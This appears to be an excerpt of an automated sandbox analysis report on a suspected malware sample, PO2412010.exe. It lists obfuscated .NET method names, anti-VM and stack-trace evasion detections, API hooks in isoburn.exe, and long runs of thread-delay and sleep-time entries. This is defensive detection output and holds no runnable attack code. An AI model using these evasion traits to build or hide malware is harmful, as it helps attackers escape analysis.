                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, pDnlN5yAAWDtlrav1i.csHigh entropy of concatenated method names: 'T7IWMfx5x7', 'LkFWU8yoex', 'lqYWOlV8nq', 'LFBWRY40hj', 'GVkWq2hjPt', 't46WuxkP5S', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, r744W0cigP8koJRxmRF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qXtWSac0iV', 'YPWWKHOLTx', 'VRGWsqAZWp', 'FobWJq9LBT', 'wswWe9XZrA', 'wb6WbPRVAS', 'MdDWCS1tbv'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, Gb8ZJLfJui7VblAL6B.csHigh entropy of concatenated method names: 'LkXOGa9j3I', 'M0EOj55Dlo', 'FSiOU7N01H', 'FIWORypCiW', 'niROuGQNwM', 'vaoUv0qJYj', 'j0JUg28YwC', 'uZNUHjLTnC', 'LGfU1OWmtT', 'b0yUdDVuZy'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, VTUDc7TXVwT9JwBhG3.csHigh entropy of concatenated method names: 'Gl6RL8jjt2', 'fDWRMabEsK', 'HKUROOfeiS', 'owJOyTgxG9', 'BnKOzgZ6lp', 'mLPRiSTJXO', 'vKZRcomP1Z', 'CNsRwVHpUC', 'idbR2yRppa', 'u2URajhI4U'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, DJWpZFaaRh43csYELG.csHigh entropy of concatenated method names: 'JrAcRkasvJ', 'oDAcu2aRwV', 'xkmcDUWqtk', 'XUIc4kHrD4', 'mnqcNbBfb8', 'NJLc3Jui7V', 'TveGnbjjSilV8Xdqi7', 'S09yN5e9HxQ3tMh3a2', 'KETccWcKUw', 'ttxc24eKh6'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, oMmQCSccb6OpQA5bbGY.csHigh entropy of concatenated method names: 'J4hWyaxWv3', 'dbGWz2Q7RL', 'eQg5i9bKjn', 'ABn5cXG7rT', 'nuG5wODV9o', 'QQT52OR1Nt', 'OdW5a4tW4n', 'zWm5Ga82XQ', 'Iwd5LTXSJa', 'el95jNYmQc'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, LJrokwwM4QkTCsbb4b.csHigh entropy of concatenated method names: 'xXOAVN7tM', 'LeX6tQcZI', 'FaPBCexoU', 'NRukmqqAF', 'qsOQXIoqO', 'ixlXJAgLk', 'DVGVfUC568pUxn3Zra', 'CBTLESIKWDdkmE69sR', 'yC8Tqo8yTpNG4riQMS', 'ixJExpR6v'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, vXZ5P6zL2uq7GM9f0t.csHigh entropy of concatenated method names: 'YQyWB2dnj1', 'JtdWm0GGt1', 'F9EWQyrQhB', 'vC7Wfb1eJD', 'aLuWhvQ1t8', 'kNsWYQKK8N', 'gF9WV06GKx', 'GRMWtNN4LZ', 'GesWpPxQc1', 'jLwW7mfhmn'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, zkasvJmNDA2aRwVk8j.csHigh entropy of concatenated method names: 'oWijJJc3ZM', 'lm4jeLKov9', 'XxkjbQnTpu', 'k2RjC3V8Qv', 'yBOjvPiGBu', 'L06jg0mXZh', 'bvSjHk5NPO', 'cNbj1R53qL', 'HJxjdM55G7', 'PyZjyTMubt'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, tX5bwTJNX64dimLshW.csHigh entropy of concatenated method names: 'sf8NZV7Lap', 'UIeNKBs6om', 'UcvNJwt8US', 'zZLNeywsjW', 'EmLNhZY0Ij', 'h5BNrn3sVi', 'euNNYj2drR', 'vXqNVhp7mM', 'mSdN0lwGTV', 'sXkNTWRmB0'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, e7DgThHAo5M1jJqJjE.csHigh entropy of concatenated method names: 'bdNqN16F5k', 'PkOqx53hcw', 'KQFqq83tQx', 'd64q5MWtga', 'g6GqlEHMxk', 'AMoqtkpPbU', 'Dispose', 'usiELCde8X', 'ISyEjUBUhB', 'abMEMTkBc9'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, VrD4mpXWEnmZN4nqbB.csHigh entropy of concatenated method names: 'CtEUIOZ3G1', 'Mc2UkS4yvp', 'GrZMragKqL', 'lu2MYx2yAG', 'z2dMVHdpIE', 'wcZM0OCabN', 'CpCMTfTnat', 'hF5MoxBRNp', 'vA1MPMVBaX', 'Re4MZOLYU2'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, YSbQ9sgCbheXMcCxGb.csHigh entropy of concatenated method names: 'NkOx1waPhU', 'OoIxymEOO7', 'NvKEiNtdSI', 'NSdEctaIkJ', 'gUgxSdV71G', 'YvtxKPsNAt', 'it1xsWHaEY', 'PWkxJwq9BC', 'Iswxemhscw', 'AouxbO8Dbs'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, Npt5TpQkmUWqtk1UIk.csHigh entropy of concatenated method names: 'jQDM6jwdpo', 'i8RMBFgwJG', 'k3dMm9Zbk8', 'Y6qMQBWO3i', 'iIOMNSm0DL', 'G8EM33eQP9', 'wVvMxcuuUn', 'kr0MEkQiEi', 'Y9jMqrU5Kb', 'e2SMWKGE3x'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, f4nhAHbJYiGSrG2I6p.csHigh entropy of concatenated method names: 'ToString', 'QIP3S8AhJ2', 'Mx13hWY8Wo', 'NBM3r3cLgn', 'WHZ3YsF9OJ', 'lxx3Vmadkt', 'YAu30DcmCC', 'hPG3Tu8E29', 'O203o7TtWp', 'DMW3PWdeLs'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.csHigh entropy of concatenated method names: 'yY92Gc6vo5', 'Qsa2L59hwk', 'IHE2jUfUpf', 'M0w2M43Npf', 'l312ULsFww', 'SUT2OLZVGJ', 'rtu2RwMdtA', 'VbD2udklSM', 'cl82nhPhjZ', 'NxT2DqbWU1'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, iFAkaUsRUBtLyssZSC.csHigh entropy of concatenated method names: 'F9ZFmWVcyS', 'Jr1FQZVDMb', 'cYGFfnkqvB', 'jy9FhMCKxK', 'ra5FY2AOvA', 'jFhFVpwZkI', 'pi8FT80xmp', 'te8FoWntey', 'VglFZVIPYI', 'zCKFSPmV80'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, dVqubqca8TCYZe6JayW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tHj8qrOxEK', 'fZ08WVYBLK', 'Sud85657XX', 'Jqw88cZl4l', 'qKa8ltoWu3', 'NGJ892yDtF', 'glt8tAorip'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, v594H6dQAAaEwMEl83.csHigh entropy of concatenated method names: 'yhuqf5uJyC', 'PwVqhFijTG', 'W7DqrmI7V4', 'JhlqYYWU6l', 'zy8qVvBpPq', 'JQyq0uveEo', 'qEAqTfEA0J', 'w89qomJMow', 'FhgqP1FuOO', 'jOFqZNFmQE'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, e20LdPPHR41HYjw2fO.csHigh entropy of concatenated method names: 'rrfRpbQWll', 'UFGR7b0oJ4', 'UfBRAcmPFd', 'zEYR6w8U8x', 'JWWRIlbnh5', 'ATrRBqxtix', 'YVURkQdAxa', 'lxxRmxkemh', 'xE3RQAdA9N', 'y55RXnOpsc'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, mCAAJ0jneiFsUqBekx.csHigh entropy of concatenated method names: 'Dispose', 'tM1cdjJqJj', 'tRKwh5gVv0', 'ultUYyYE26', 'rBqcyAkJSf', 'cyEczt22J8', 'ProcessDialogKey', 'pXlwi594H6', 'EAAwcaEwME', 'v83ww3DnlN'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, pDnlN5yAAWDtlrav1i.csHigh entropy of concatenated method names: 'T7IWMfx5x7', 'LkFWU8yoex', 'lqYWOlV8nq', 'LFBWRY40hj', 'GVkWq2hjPt', 't46WuxkP5S', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, r744W0cigP8koJRxmRF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qXtWSac0iV', 'YPWWKHOLTx', 'VRGWsqAZWp', 'FobWJq9LBT', 'wswWe9XZrA', 'wb6WbPRVAS', 'MdDWCS1tbv'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, Gb8ZJLfJui7VblAL6B.csHigh entropy of concatenated method names: 'LkXOGa9j3I', 'M0EOj55Dlo', 'FSiOU7N01H', 'FIWORypCiW', 'niROuGQNwM', 'vaoUv0qJYj', 'j0JUg28YwC', 'uZNUHjLTnC', 'LGfU1OWmtT', 'b0yUdDVuZy'
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, VTUDc7TXVwT9JwBhG3.csHigh entropy of concatenated method names: 'Gl6RL8jjt2', 'fDWRMabEsK', 'HKUROOfeiS', 'owJOyTgxG9', 'BnKOzgZ6lp', 'mLPRiSTJXO', 'vKZRcomP1Z', 'CNsRwVHpUC', 'idbR2yRppa', 'u2URajhI4U'
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PO2412010.exe PID: 7300, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: 2400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC096E rdtsc 3_2_01AC096E
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239766Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239641Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239531Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239419Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239312Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239203Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239094Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238981Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238825Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238671Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238555Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238438Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238313Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238188Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238077Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237930Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237702Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237586Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237469Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237359Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237250Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237141Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237031Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236922Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236813Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236688Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236563Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236453Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236344Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236219Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236109Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236000Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235891Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235781Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235670Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235531Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeWindow / User API: threadDelayed 1840Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeWindow / User API: threadDelayed 5366Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 3721Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 6251Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239419s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -239094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238981s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238825s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238555s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -238077s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237930s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237702s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237586s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -237031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -236000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -235891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -235781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -235670s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356Thread sleep time: -235531s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872Thread sleep count: 3721 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872Thread sleep time: -7442000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872Thread sleep count: 6251 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872Thread sleep time: -12502000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0263C4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0263C4E0
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239766Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239641Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239531Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239419Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239312Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239203Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 239094Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238981Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238825Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238671Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238555Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238438Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238313Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238188Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 238077Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237930Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237702Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237586Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237469Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237359Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237250Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237141Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 237031Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236922Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236813Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236688Jump to behavior
